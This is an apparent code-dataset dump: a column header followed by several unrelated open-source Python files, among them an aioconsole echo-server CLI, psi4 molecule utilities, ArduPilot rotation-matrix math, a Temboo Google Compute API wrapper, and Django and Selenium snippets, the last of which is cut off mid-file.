text
stringlengths 6
947k
| repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
|
---|---|---|---|---|---|---|
"""Command line interface for echo server."""
import fnmatch
import asyncio
import argparse
from aioconsole import AsynchronousCli, start_interactive_server
from aioconsole.server import parse_server, print_server
from . import echo
async def get_history(reader, writer, pattern=None):
history = asyncio.get_event_loop().history
if not history:
return "No message in the history"
if pattern:
history = {host: history[host] for host in fnmatch.filter(history, pattern)}
if not history:
return "No host match the given pattern"
for host in history:
writer.write(f"Host {host}:\n".encode())
for i, message in enumerate(history[host]):
writer.write(f" {i}. {message}\n".encode())
def make_cli(streams=None):
parser = argparse.ArgumentParser(description="Display the message history")
parser.add_argument("--pattern", "-p", type=str, help="pattern to filter hostnames")
commands = {"history": (get_history, parser)}
return AsynchronousCli(commands, streams, prog="echo")
def parse_args(args=None):
parser = argparse.ArgumentParser(
description="Run the echo server and a command line interface."
)
parser.add_argument(
"server",
metavar="[HOST:]PORT",
type=str,
help="interface for the echo server, default host is localhost",
)
parser.add_argument(
"--serve-cli",
metavar="[HOST:]PORT",
type=str,
help="serve the command line interface on the given host+port "
"instead of using the standard streams",
)
namespace = parser.parse_args(args)
host, port = parse_server(namespace.server, parser)
if namespace.serve_cli is not None:
serve_cli = parse_server(namespace.serve_cli, parser)
else:
serve_cli = None
return host, port, serve_cli
def main(args=None):
host, port, serve_cli = parse_args(args)
if serve_cli:
cli_host, cli_port = serve_cli
coro = start_interactive_server(make_cli, cli_host, cli_port)
server = asyncio.get_event_loop().run_until_complete(coro)
print_server(server, "command line interface")
else:
asyncio.ensure_future(make_cli().interact())
return echo.run(host, port)
if __name__ == "__main__":
main()
|
vxgmichel/aioconsole
|
example/cli.py
|
Python
|
gpl-3.0
| 2,320 | 0.000862 |
#
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2022 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This file is part of Psi4.
#
# Psi4 is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, version 3.
#
# Psi4 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with Psi4; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
"""Module with utility functions that act on molecule objects."""
from typing import Dict, Tuple, Union
import numpy as np
import qcelemental as qcel
from psi4 import core
from psi4.driver.p4util import temp_circular_import_blocker
from psi4.driver import qcdb
from psi4.driver.p4util.exceptions import *
def molecule_set_attr(self, name, value):
"""Function to redefine __setattr__ method of molecule class."""
fxn = object.__getattribute__(self, "is_variable")
isvar = fxn(name)
if isvar:
fxn = object.__getattribute__(self, "set_variable")
fxn(name, value)
return
object.__setattr__(self, name, value)
def molecule_get_attr(self, name):
"""Function to redefine __getattr__ method of molecule class."""
fxn = object.__getattribute__(self, "is_variable")
isvar = fxn(name)
if isvar:
fxn = object.__getattribute__(self, "get_variable")
return fxn(name)
return object.__getattribute__(self, name)
@classmethod
def _molecule_from_string(cls,
molstr,
dtype=None,
name=None,
fix_com=None,
fix_orientation=None,
fix_symmetry=None,
return_dict=False,
enable_qm=True,
enable_efp=True,
missing_enabled_return_qm='none',
missing_enabled_return_efp='none',
verbose=1):
molrec = qcel.molparse.from_string(
molstr=molstr,
dtype=dtype,
name=name,
fix_com=fix_com,
fix_orientation=fix_orientation,
fix_symmetry=fix_symmetry,
return_processed=False,
enable_qm=enable_qm,
enable_efp=enable_efp,
missing_enabled_return_qm=missing_enabled_return_qm,
missing_enabled_return_efp=missing_enabled_return_efp,
verbose=verbose)
if return_dict:
return core.Molecule.from_dict(molrec['qm']), molrec
else:
return core.Molecule.from_dict(molrec['qm'])
@classmethod
def _molecule_from_arrays(cls,
geom=None,
elea=None,
elez=None,
elem=None,
mass=None,
real=None,
elbl=None,
name=None,
units='Angstrom',
input_units_to_au=None,
fix_com=None,
fix_orientation=None,
fix_symmetry=None,
fragment_separators=None,
fragment_charges=None,
fragment_multiplicities=None,
molecular_charge=None,
molecular_multiplicity=None,
comment=None,
provenance=None,
connectivity=None,
missing_enabled_return='error',
tooclose=0.1,
zero_ghost_fragments=False,
nonphysical=False,
mtol=1.e-3,
verbose=1,
return_dict=False):
"""Construct Molecule from unvalidated arrays and variables.
Light wrapper around :py:func:`~qcelemental.molparse.from_arrays`
that is a full-featured constructor to dictionary representa-
tion of Molecule. This follows one step further to return
Molecule instance.
Parameters
----------
See :py:func:`~qcelemental.molparse.from_arrays`.
Returns
-------
:py:class:`psi4.core.Molecule`
"""
molrec = qcel.molparse.from_arrays(
geom=geom,
elea=elea,
elez=elez,
elem=elem,
mass=mass,
real=real,
elbl=elbl,
name=name,
units=units,
input_units_to_au=input_units_to_au,
fix_com=fix_com,
fix_orientation=fix_orientation,
fix_symmetry=fix_symmetry,
fragment_separators=fragment_separators,
fragment_charges=fragment_charges,
fragment_multiplicities=fragment_multiplicities,
molecular_charge=molecular_charge,
molecular_multiplicity=molecular_multiplicity,
comment=comment,
provenance=provenance,
connectivity=connectivity,
domain='qm',
missing_enabled_return=missing_enabled_return,
tooclose=tooclose,
zero_ghost_fragments=zero_ghost_fragments,
nonphysical=nonphysical,
mtol=mtol,
verbose=verbose)
if return_dict:
return core.Molecule.from_dict(molrec), molrec
else:
return core.Molecule.from_dict(molrec)
@classmethod
def _molecule_from_schema(cls, molschema: Dict, return_dict: bool = False, nonphysical: bool = False, verbose: int = 1) -> Union[core.Molecule, Tuple[core.Molecule, Dict]]:
"""Construct Molecule from non-Psi4 schema.
Light wrapper around :py:func:`~psi4.core.Molecule.from_arrays`.
Parameters
----------
molschema
Dictionary form of Molecule following known schema.
return_dict
Additionally return Molecule dictionary intermediate.
nonphysical
Do allow masses outside an element's natural range to pass validation?
verbose
Amount of printing.
Returns
-------
mol : :py:class:`psi4.core.Molecule`
molrec : dict
Dictionary representation of instance.
Only provided if `return_dict` is True.
"""
molrec = qcel.molparse.from_schema(molschema, nonphysical=nonphysical, verbose=verbose)
qmol = core.Molecule.from_dict(molrec)
geom = np.array(molrec["geom"]).reshape((-1, 3))
qmol._initial_cartesian = core.Matrix.from_array(geom)
if return_dict:
return qmol, molrec
else:
return qmol
def dynamic_variable_bind(cls):
"""Function to dynamically add extra members to
the core.Molecule class.
"""
cls.__setattr__ = molecule_set_attr
cls.__getattr__ = molecule_get_attr
cls.to_arrays = qcdb.Molecule.to_arrays
cls.to_dict = qcdb.Molecule.to_dict
cls.BFS = qcdb.Molecule.BFS
cls.B787 = qcdb.Molecule.B787
cls.scramble = qcdb.Molecule.scramble
cls.from_arrays = _molecule_from_arrays
cls.from_string = _molecule_from_string
cls.to_string = qcdb.Molecule.to_string
cls.from_schema = _molecule_from_schema
cls.to_schema = qcdb.Molecule.to_schema
cls.run_dftd3 = qcdb.Molecule.run_dftd3
cls.run_dftd4 = qcdb.Molecule.run_dftd4
cls.run_gcp = qcdb.Molecule.run_gcp
cls.format_molecule_for_mol = qcdb.Molecule.format_molecule_for_mol
dynamic_variable_bind(core.Molecule) # pass class type, not class instance
#
# Define geometry to be used by PSI4.
# The molecule created by this will be set in options.
#
# geometry("
# O 1.0 0.0 0.0
# H 0.0 1.0 0.0
# H 0.0 0.0 0.0
#
def geometry(geom, name="default"):
"""Function to create a molecule object of name *name* from the
geometry in string *geom*. Permitted for user use but deprecated
in driver in favor of explicit molecule-passing. Comments within
the string are filtered.
"""
molrec = qcel.molparse.from_string(
geom, enable_qm=True, missing_enabled_return_qm='minimal', enable_efp=True, missing_enabled_return_efp='none')
molecule = core.Molecule.from_dict(molrec['qm'])
if "geom" in molrec["qm"]:
geom = np.array(molrec["qm"]["geom"]).reshape((-1, 3))
if molrec["qm"]["units"] == "Angstrom":
geom = geom / qcel.constants.bohr2angstroms
molecule._initial_cartesian = core.Matrix.from_array(geom)
molecule.set_name(name)
if 'efp' in molrec:
try:
import pylibefp
except ImportError as e: # py36 ModuleNotFoundError
raise ImportError("""Install pylibefp to use EFP functionality. `conda install pylibefp -c psi4` Or build with `-DENABLE_libefp=ON`""") from e
#print('Using pylibefp: {} (version {})'.format(pylibefp.__file__, pylibefp.__version__))
efpobj = pylibefp.from_dict(molrec['efp'])
# pylibefp.core.efp rides along on molecule
molecule.EFP = efpobj
# Attempt to go ahead and construct the molecule
try:
molecule.update_geometry()
except Exception:
core.print_out("Molecule: geometry: Molecule is not complete, please use 'update_geometry'\n"
" once all variables are set.\n")
activate(molecule)
return molecule
def activate(mol):
"""Function to set molecule object *mol* as the current active molecule.
Permitted for user use but deprecated in driver in favor of explicit
molecule-passing.
"""
core.set_active_molecule(mol)
|
psi4/psi4
|
psi4/driver/molutil.py
|
Python
|
lgpl-3.0
| 9,885 | 0.004856 |
#!/usr/bin/env python
#
# vector3 and rotation matrix classes
# This follows the conventions in the ArduPilot code,
# and is essentially a python version of the AP_Math library
#
# Andrew Tridgell, March 2012
#
# This library is free software; you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation; either version 2.1 of the License, or (at your
# option) any later version.
#
# This library is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License
# for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this library; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
'''rotation matrix class
'''
from math import sin, cos, sqrt, asin, atan2, pi, radians, acos, degrees
class Vector3:
'''a vector'''
def __init__(self, x=None, y=None, z=None):
if x != None and y != None and z != None:
self.x = float(x)
self.y = float(y)
self.z = float(z)
elif x != None and len(x) == 3:
self.x = float(x[0])
self.y = float(x[1])
self.z = float(x[2])
elif x != None:
raise ValueError('bad initialiser')
else:
self.x = float(0)
self.y = float(0)
self.z = float(0)
def __repr__(self):
return 'Vector3(%.2f, %.2f, %.2f)' % (self.x,
self.y,
self.z)
def __add__(self, v):
return Vector3(self.x + v.x,
self.y + v.y,
self.z + v.z)
__radd__ = __add__
def __sub__(self, v):
return Vector3(self.x - v.x,
self.y - v.y,
self.z - v.z)
def __neg__(self):
return Vector3(-self.x, -self.y, -self.z)
def __rsub__(self, v):
return Vector3(v.x - self.x,
v.y - self.y,
v.z - self.z)
def __mul__(self, v):
if isinstance(v, Vector3):
'''dot product'''
return self.x*v.x + self.y*v.y + self.z*v.z
return Vector3(self.x * v,
self.y * v,
self.z * v)
__rmul__ = __mul__
def __div__(self, v):
return Vector3(self.x / v,
self.y / v,
self.z / v)
def __mod__(self, v):
'''cross product'''
return Vector3(self.y*v.z - self.z*v.y,
self.z*v.x - self.x*v.z,
self.x*v.y - self.y*v.x)
def __copy__(self):
return Vector3(self.x, self.y, self.z)
copy = __copy__
def length(self):
return sqrt(self.x**2 + self.y**2 + self.z**2)
def zero(self):
self.x = self.y = self.z = 0
def angle(self, v):
'''return the angle between this vector and another vector'''
return acos((self * v) / (self.length() * v.length()))
def normalized(self):
return self.__div__(self.length())
def normalize(self):
v = self.normalized()
self.x = v.x
self.y = v.y
self.z = v.z
class Matrix3:
'''a 3x3 matrix, intended as a rotation matrix'''
def __init__(self, a=None, b=None, c=None):
if a is not None and b is not None and c is not None:
self.a = a.copy()
self.b = b.copy()
self.c = c.copy()
else:
self.identity()
def __repr__(self):
return 'Matrix3((%.2f, %.2f, %.2f), (%.2f, %.2f, %.2f), (%.2f, %.2f, %.2f))' % (
self.a.x, self.a.y, self.a.z,
self.b.x, self.b.y, self.b.z,
self.c.x, self.c.y, self.c.z)
def identity(self):
self.a = Vector3(1,0,0)
self.b = Vector3(0,1,0)
self.c = Vector3(0,0,1)
def transposed(self):
return Matrix3(Vector3(self.a.x, self.b.x, self.c.x),
Vector3(self.a.y, self.b.y, self.c.y),
Vector3(self.a.z, self.b.z, self.c.z))
def from_euler(self, roll, pitch, yaw):
'''fill the matrix from Euler angles in radians'''
cp = cos(pitch)
sp = sin(pitch)
sr = sin(roll)
cr = cos(roll)
sy = sin(yaw)
cy = cos(yaw)
self.a.x = cp * cy
self.a.y = (sr * sp * cy) - (cr * sy)
self.a.z = (cr * sp * cy) + (sr * sy)
self.b.x = cp * sy
self.b.y = (sr * sp * sy) + (cr * cy)
self.b.z = (cr * sp * sy) - (sr * cy)
self.c.x = -sp
self.c.y = sr * cp
self.c.z = cr * cp
def to_euler(self):
'''find Euler angles for the matrix'''
if self.c.x >= 1.0:
pitch = pi
elif self.c.x <= -1.0:
pitch = -pi
else:
pitch = -asin(self.c.x)
roll = atan2(self.c.y, self.c.z)
yaw = atan2(self.b.x, self.a.x)
return (roll, pitch, yaw)
def __add__(self, m):
return Matrix3(self.a + m.a, self.b + m.b, self.c + m.c)
__radd__ = __add__
def __sub__(self, m):
return Matrix3(self.a - m.a, self.b - m.b, self.c - m.c)
def __rsub__(self, m):
return Matrix3(m.a - self.a, m.b - self.b, m.c - self.c)
def __mul__(self, other):
if isinstance(other, Vector3):
v = other
return Vector3(self.a.x * v.x + self.a.y * v.y + self.a.z * v.z,
self.b.x * v.x + self.b.y * v.y + self.b.z * v.z,
self.c.x * v.x + self.c.y * v.y + self.c.z * v.z)
elif isinstance(other, Matrix3):
m = other
return Matrix3(Vector3(self.a.x * m.a.x + self.a.y * m.b.x + self.a.z * m.c.x,
self.a.x * m.a.y + self.a.y * m.b.y + self.a.z * m.c.y,
self.a.x * m.a.z + self.a.y * m.b.z + self.a.z * m.c.z),
Vector3(self.b.x * m.a.x + self.b.y * m.b.x + self.b.z * m.c.x,
self.b.x * m.a.y + self.b.y * m.b.y + self.b.z * m.c.y,
self.b.x * m.a.z + self.b.y * m.b.z + self.b.z * m.c.z),
Vector3(self.c.x * m.a.x + self.c.y * m.b.x + self.c.z * m.c.x,
self.c.x * m.a.y + self.c.y * m.b.y + self.c.z * m.c.y,
self.c.x * m.a.z + self.c.y * m.b.z + self.c.z * m.c.z))
v = other
return Matrix3(self.a * v, self.b * v, self.c * v)
def __div__(self, v):
return Matrix3(self.a / v, self.b / v, self.c / v)
def __neg__(self):
return Matrix3(-self.a, -self.b, -self.c)
def __copy__(self):
return Matrix3(self.a, self.b, self.c)
copy = __copy__
def rotate(self, g):
'''rotate the matrix by a given amount on 3 axes'''
temp_matrix = Matrix3()
a = self.a
b = self.b
c = self.c
temp_matrix.a.x = a.y * g.z - a.z * g.y
temp_matrix.a.y = a.z * g.x - a.x * g.z
temp_matrix.a.z = a.x * g.y - a.y * g.x
temp_matrix.b.x = b.y * g.z - b.z * g.y
temp_matrix.b.y = b.z * g.x - b.x * g.z
temp_matrix.b.z = b.x * g.y - b.y * g.x
temp_matrix.c.x = c.y * g.z - c.z * g.y
temp_matrix.c.y = c.z * g.x - c.x * g.z
temp_matrix.c.z = c.x * g.y - c.y * g.x
self.a += temp_matrix.a
self.b += temp_matrix.b
self.c += temp_matrix.c
def normalize(self):
'''re-normalise a rotation matrix'''
error = self.a * self.b
t0 = self.a - (self.b * (0.5 * error))
t1 = self.b - (self.a * (0.5 * error))
t2 = t0 % t1
self.a = t0 * (1.0 / t0.length())
self.b = t1 * (1.0 / t1.length())
self.c = t2 * (1.0 / t2.length())
def trace(self):
'''the trace of the matrix'''
return self.a.x + self.b.y + self.c.z
def from_axis_angle(self, axis, angle):
'''create a rotation matrix from axis and angle'''
ux = axis.x
uy = axis.y
uz = axis.z
ct = cos(angle)
st = sin(angle)
self.a.x = ct + (1-ct) * ux**2
self.a.y = ux*uy*(1-ct) - uz*st
self.a.z = ux*uz*(1-ct) + uy*st
self.b.x = uy*ux*(1-ct) + uz*st
self.b.y = ct + (1-ct) * uy**2
self.b.z = uy*uz*(1-ct) - ux*st
self.c.x = uz*ux*(1-ct) - uy*st
self.c.y = uz*uy*(1-ct) + ux*st
self.c.z = ct + (1-ct) * uz**2
def from_two_vectors(self, vec1, vec2):
'''get a rotation matrix from two vectors.
This returns a rotation matrix which when applied to vec1
will produce a vector pointing in the same direction as vec2'''
angle = vec1.angle(vec2)
cross = vec1 % vec2
if cross.length() == 0:
# the two vectors are colinear
return self.from_euler(0,0,angle)
cross.normalize()
return self.from_axis_angle(cross, angle)
class Plane:
'''a plane in 3 space, defined by a point and a vector normal'''
def __init__(self, point=None, normal=None):
if point is None:
point = Vector3(0,0,0)
if normal is None:
normal = Vector3(0, 0, 1)
self.point = point
self.normal = normal
class Line:
'''a line in 3 space, defined by a point and a vector'''
def __init__(self, point=None, vector=None):
if point is None:
point = Vector3(0,0,0)
if vector is None:
vector = Vector3(0, 0, 1)
self.point = point
self.vector = vector
def plane_intersection(self, plane, forward_only=False):
'''return point where line intersects with a plane'''
l_dot_n = self.vector * plane.normal
if l_dot_n == 0.0:
# line is parallel to the plane
return None
d = ((plane.point - self.point) * plane.normal) / l_dot_n
if forward_only and d < 0:
return None
return (self.vector * d) + self.point
def test_euler():
'''check that from_euler() and to_euler() are consistent'''
m = Matrix3()
from math import radians, degrees
for r in range(-179, 179, 3):
for p in range(-89, 89, 3):
for y in range(-179, 179, 3):
m.from_euler(radians(r), radians(p), radians(y))
(r2, p2, y2) = m.to_euler()
v1 = Vector3(r,p,y)
v2 = Vector3(degrees(r2),degrees(p2),degrees(y2))
diff = v1 - v2
if diff.length() > 1.0e-12:
print('EULER ERROR:', v1, v2, diff.length())
def test_two_vectors():
'''test the from_two_vectors() method'''
import random
for i in range(1000):
v1 = Vector3(1, 0.2, -3)
v2 = Vector3(random.uniform(-5,5), random.uniform(-5,5), random.uniform(-5,5))
m = Matrix3()
m.from_two_vectors(v1, v2)
v3 = m * v1
diff = v3.normalized() - v2.normalized()
(r, p, y) = m.to_euler()
if diff.length() > 0.001:
print('err=%f' % diff.length())
print("r/p/y = %.1f %.1f %.1f" % (
degrees(r), degrees(p), degrees(y)))
print(v1.normalized(), v2.normalized(), v3.normalized())
def test_plane():
'''testing line/plane intersection'''
print("testing plane/line maths")
plane = Plane(Vector3(0,0,0), Vector3(0,0,1))
line = Line(Vector3(0,0,100), Vector3(10, 10, -90))
p = line.plane_intersection(plane)
print(p)
if __name__ == "__main__":
import doctest
doctest.testmod()
test_euler()
test_two_vectors()
|
owenson/ardupilot-sdk-python
|
pymavlink/rotmat.py
|
Python
|
lgpl-3.0
| 12,026 | 0.004906 |
# -*- coding: utf-8 -*-
###############################################################################
#
# GetInstance
# Retrieves information about the specified Instance.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class GetInstance(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the GetInstance Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(GetInstance, self).__init__(temboo_session, '/Library/Google/ComputeEngine/Instances/GetInstance')
def new_input_set(self):
return GetInstanceInputSet()
def _make_result_set(self, result, path):
return GetInstanceResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return GetInstanceChoreographyExecution(session, exec_id, path)
class GetInstanceInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the GetInstance
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AccessToken(self, value):
"""
Set the value of the AccessToken input for this Choreo. ((optional, string) A valid access token retrieved during the OAuth process. This is required unless you provide the ClientID, ClientSecret, and RefreshToken to generate a new access token.)
"""
super(GetInstanceInputSet, self)._set_input('AccessToken', value)
def set_ClientID(self, value):
"""
Set the value of the ClientID input for this Choreo. ((conditional, string) The Client ID provided by Google. Required unless providing a valid AccessToken.)
"""
super(GetInstanceInputSet, self)._set_input('ClientID', value)
def set_ClientSecret(self, value):
"""
Set the value of the ClientSecret input for this Choreo. ((conditional, string) The Client Secret provided by Google. Required unless providing a valid AccessToken.)
"""
super(GetInstanceInputSet, self)._set_input('ClientSecret', value)
def set_Fields(self, value):
"""
Set the value of the Fields input for this Choreo. ((optional, string) Comma-seperated list of fields you want to include in the response.)
"""
super(GetInstanceInputSet, self)._set_input('Fields', value)
def set_Instance(self, value):
"""
Set the value of the Instance input for this Choreo. ((required, string) The name of the instance to retrieve.)
"""
super(GetInstanceInputSet, self)._set_input('Instance', value)
def set_Project(self, value):
"""
Set the value of the Project input for this Choreo. ((required, string) The ID of a Google Compute project.)
"""
super(GetInstanceInputSet, self)._set_input('Project', value)
def set_RefreshToken(self, value):
"""
Set the value of the RefreshToken input for this Choreo. ((conditional, string) An OAuth refresh token used to generate a new access token when the original token is expired. Required unless providing a valid AccessToken.)
"""
super(GetInstanceInputSet, self)._set_input('RefreshToken', value)
def set_Zone(self, value):
"""
Set the value of the Zone input for this Choreo. ((required, string) The name of the zone associated with this request.)
"""
super(GetInstanceInputSet, self)._set_input('Zone', value)
class GetInstanceResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the GetInstance Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((json) The response from Google.)
"""
return self._output.get('Response', None)
def get_NewAccessToken(self):
"""
Retrieve the value for the "NewAccessToken" output from this Choreo execution. ((string) Contains a new AccessToken when the RefreshToken is provided.)
"""
return self._output.get('NewAccessToken', None)
class GetInstanceChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return GetInstanceResultSet(response, path)
|
jordanemedlock/psychtruths
|
temboo/core/Library/Google/ComputeEngine/Instances/GetInstance.py
|
Python
|
apache-2.0
| 5,317 | 0.005266 |
# -*- coding: utf-8 -*-
# crunchyfrog - a database schema browser and query tool
# Copyright (C) 2008 Andi Albrecht <albrecht.andi@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Configuration"""
import gobject
from os.path import abspath, dirname, join
from configobj import ConfigObj
from gettext import gettext as _
import logging
log = logging.getLogger("CONFIG")
class Config(gobject.GObject):
"""Configuration object
An instance of this class is accessible through the ``config``
attribute of an `CFApplication`_ instance.
The Config class is a simplified wrapper around a ConfigObj
instance. It merges a default configuration located as package
data in this package with an user configuration.
The ``-c`` command line switch determines which user configuration
file is used. If it's not set, it defaults to
``~/.config/crunchyfrog/config``.
This wrapper provides only a getter and a setter for configuration
values and expects that option names are dotted strings (but only by
convention).
Values can be any basic Python types since it uses ConfigObj's
``unrepr`` mode (Read the `ConfigObj documentation`_ for details).
Plugins can connect to the `changed` signal to track configuration
changes, i.e. the SQL editor uses this signal to reflect changes
made through the preference dialog.
.. Note:: The runtime Config instance (``app.config``) is bound
to the application. So it is not possible to store instance
specific data here.
:Usage example:
.. sourcecode:: python
>>> app.config.get("foo.bar") # Not set yet, None is default
None
>>> app.config.set("foo.bar", True)
>>> app.config.get("foo.bar")
True
>>> app.config.set("foo.bar", ["Completely", "different"]) # No type check!
>>> print " ".join(app.config.get("foo.bar"))
Completely different
:Signals:
changed
``def callback(config, key, value, user_oaram1, ...)``
Emitted when a option has changed.
.. _CFApplication: cf.app.CFApplication.html
.. _ConfigObj documentation: http://www.voidspace.org.uk/python/configobj.html#unrepr-mode
"""
__gsignals__ = {
"changed" : (gobject.SIGNAL_RUN_LAST,
gobject.TYPE_NONE,
(str, gobject.TYPE_PYOBJECT)),
}
def __init__(self, app, config_file):
"""
The constructor of this class takes two arguments:
:Parameter:
app
`CFApplication`_ instance
config_file
Path to user configuration file
.. _CFApplication: cf.app.CFApplication.html
"""
self.app = app
self.__gobject_init__() # IGNORE:E1101
self.__conf = None
self.__config_file = config_file
self.__init_conf()
self.app.register_shutdown_task(self.on_app_shutdown,
_(u"Writing configuration"))
def on_app_shutdown(self, *args): # IGNORE:W0613
"""Callback: write configuration file to disk"""
self.write()
def __init_conf(self):
"""Intialize the configuration system"""
self.__conf = ConfigObj(abspath(join(dirname(__file__), "default.cfg")),
unrepr=True)
log.info("Loading configuration file %r" % self.__config_file)
self.__conf.update(ConfigObj(self.__config_file, unrepr=True))
def init(self):
"""Loads configuration"""
pass
def get(self, key, default=None):
"""Returns value or default for key"""
return self.__conf.get(key, default)
def set(self, key, value):
"""Sets key to value"""
self.__conf[key] = value
self.emit("changed", key, value) # IGNORE:E1101
def write(self, fname=None):
"""Writes configuration file"""
if not fname:
fname = self.__config_file
fp = open(fname, "w")
self.__conf.write(fp)
fp.close()
|
angvp/angelvelasquez-crunchyfrog
|
cf/config/__init__.py
|
Python
|
gpl-3.0
| 4,652 | 0.001505 |
#!/usr/bin/env python
from __future__ import print_function
import sys
import numpy
import pni.io.nx.h5 as nexus
f = nexus.create_file("test_string2.nxs",True);
d = f.root().create_group("scan_1","NXentry").\
create_group("detector","NXdetector")
sa= d.create_field("ListofStrings","string",shape=(3,2))
sa[0,0]="safdfdsffdsfd"
sa[1,0]="safdsfsfdsffdsfd"
sa[2,0]="safdfsfd"
print(sa[0,0])
print(sa[1,0])
print(sa[2,0])
print(sa[...])
f.close()
|
pni-libraries/python-pni
|
doc/examples/old_examples/test_string2.py
|
Python
|
gpl-2.0
| 494 | 0.036437 |
"""Drafts as required folder
Revision ID: 41a7e825d108
Revises: 269247bc37d3
Create Date: 2014-03-13 21:14:25.652333
"""
# revision identifiers, used by Alembic.
revision = '41a7e825d108'
down_revision = '269247bc37d3'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.add_column('imapaccount', sa.Column('drafts_folder_name', sa.String(255), nullable=True))
def downgrade():
op.drop_column('imapaccount', 'drafts_folder_name')
|
nylas/sync-engine
|
migrations/versions/004_drafts_as_required_folder.py
|
Python
|
agpl-3.0
| 459 | 0.006536 |
#!/usr/bin/python
#
# Copyright 2008-2010 WebDriver committers
# Copyright 2008-2010 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from selenium import webdriver
from selenium.test.selenium.webdriver.common import api_examples
from selenium.test.selenium.webdriver.common.webserver import SimpleWebServer
def setup_module(module):
webserver = SimpleWebServer()
webserver.start()
FirefoxApiExampleTest.webserver = webserver
FirefoxApiExampleTest.driver = webdriver.Firefox()
class FirefoxApiExampleTest(api_examples.ApiExampleTest):
pass
def teardown_module(module):
FirefoxApiExampleTest.driver.quit()
FirefoxApiExampleTest.webserver.stop()
|
gx1997/chrome-loongson
|
third_party/webdriver/python/test/selenium/webdriver/firefox/test_ff_api.py
|
Python
|
bsd-3-clause
| 1,189 | 0.001682 |
from application import app as application
from gevent import monkey
from socketio.server import SocketIOServer
monkey.patch_all()
if __name__ == '__main__':
# SocketIOServer(
# ('', application.config['PORT']),
# application,
# resource="socket.io").serve_forever()
socketio.run(application)
|
PhoenixRacing/PhoenixRacingWebApp-noregrets
|
run_server.py
|
Python
|
bsd-3-clause
| 327 | 0.003058 |
# browsershots.org - Test your web design in different browsers
# Copyright (C) 2007 Johann C. Rocholl <johann@browsershots.org>
#
# Browsershots is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# Browsershots is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
URL configuration for the accounts app.
"""
__revision__ = "$Rev: 2160 $"
__date__ = "$Date: 2007-09-18 19:12:50 -0400 (Tue, 18 Sep 2007) $"
__author__ = "$Author: johann $"
from django.conf.urls.defaults import patterns
urlpatterns = patterns('shotserver04.accounts.views',
(r'^login/$', 'login'),
(r'^logout/$', 'logout'),
(r'^profile/$', 'profile'),
(r'^email/$', 'email'),
(r'^verify/(?P<hashkey>[0-9a-f]{32})/$', 'verify'),
)
|
foligny/browsershots-psycopg2
|
shotserver/shotserver04/accounts/urls.py
|
Python
|
gpl-3.0
| 1,222 | 0.000818 |
from django.shortcuts import render, redirect, get_object_or_404
from django.core.urlresolvers import reverse
from openiv.settings import *
# Create your views here.
def index(request):
return redirect(reverse('public:event'))
# Comment the above to have an independent home page.
context = {
'imagesource': 'public/images/image-1.jpg',
'activetab': 'home',
'titletext': EVENT_MEDIUM_NAME,
'text1': [
